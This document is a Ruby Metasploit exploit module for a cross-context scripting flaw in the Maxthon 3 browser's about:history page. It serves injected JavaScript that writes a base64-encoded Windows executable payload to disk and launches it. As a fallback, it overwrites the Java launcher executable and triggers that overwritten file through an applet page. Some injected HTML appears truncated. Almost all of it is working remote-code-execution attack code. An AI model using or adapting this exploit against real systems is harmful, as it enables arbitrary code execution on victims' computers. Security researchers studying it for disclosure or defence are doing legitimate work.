require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Maxthon about:history XCS', 'Description' => %q{ Cross Context Scripting (XCS) is possible in the Maxthon about:history page. Injection in such privileged/trusted browser zone can be used to modify configuration settings and execute arbitrary commands. Affects Maxthon 3 browsers. }, 'License' => BSD_LICENSE, 'Author' => [ 'Roberto Suggi Liverani', # Discovered the vulnerability and developed msf module ], 'Version' => '$Revision: 1 $', 'References' => [ ['CVE', 'TBA'], ['URL', 'http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html'], ], 'Payload' => { 'DisableNops' => true, }, 'Targets' => [ ['Maxthon 3', { 'Platform' => 'win', } ], ], 'DisclosureDate' => 'Nov 26 2012', 'DefaultTarget' => 0 )) register_options( [ OptString.new('JPATH', [true, "Java executable path to overwrite", 'C:\\\\Program\\ Files\\\\Java\\\\jre7\\\\bin\\\\jp2launcher.exe']), OptString.new('JAVAURL', [true, "Java Applet URL", 'http://profs.etsmtl.ca/mmcguffin/learn/java/01-drawingLines/']), ], self.class ) end def on_request_uri(cli, request) jpath = datastore['JPATH'] javaurl = datastore['JAVAURL'] headers = {} html_hdr = %Q^ Loading ^ html_ftr = %Q^

Loading

^ case request.uri when /[?]jspayload/ p = regenerate_payload(cli) if (p.nil?) send_not_found(cli) return end # We're going to run this through unescape(), so make sure # everything is encoded penc = Msf::Util::EXE.to_win32pe(framework, p.encoded) penc2 = Rex::Text.encode_base64(penc) # now this is base64 encoded payload which needs to be passed to the file write api in maxthon # depending on maxthon version, then file can be launched via Program DOM API # or replacing Java program content = %Q{ var fileTemp = new maxthon.io.File.createTempFile("test","exe"); var fileObj = maxthon.io.File(fileTemp); maxthon.io.FileWriter(fileTemp); if(maxthon.program) { maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}"); maxthon.program.Program.launch(fileTemp.name_,"C:"); } else { // here we need to take a dirty approach, we need to overwrite an existing exe and then invoke it // this is because the maxthon.program object has been silently removed in latest Maxthon versions... // in WindowsXP, any exe can be overwritten, then a simple call to a uri scheme can invoke the exe // e.g. wab.exe invoked via mailto:// // however, in win7, a prompt will be displayed if browser executes a mail client or an external program // so a common way to exploit would be to overwrite the j2plauncher.exe, which calls java.exe when applet is found // once that is done, then we can point to a page where a java applet exists which will invoke java.exe, // unless previously loaded by the user // fileTemp.name_ = "#{jpath}"; maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}"); a=document.createElement("iframe"); a.setAttribute("src","#{javaurl}"); document.body.appendChild(a) } } when /[?]history/ js = %Q^ window.onload = function() { location.href = "about:history"; } ^ content = %Q^ #{html_hdr} #{html_ftr} ^ when get_resource() print_status("Sending #{self.name} payload for request #{request.uri}") js = %Q^ url = location.href; url2 = url + "?jspayload=1"; inj = "?history#%22/>

#{js} #{html_ftr} ^ else print_status("Sending 404 for request #{request.uri}") send_not_found(cli) return end send_response_html(cli, content, headers) handler(cli) end end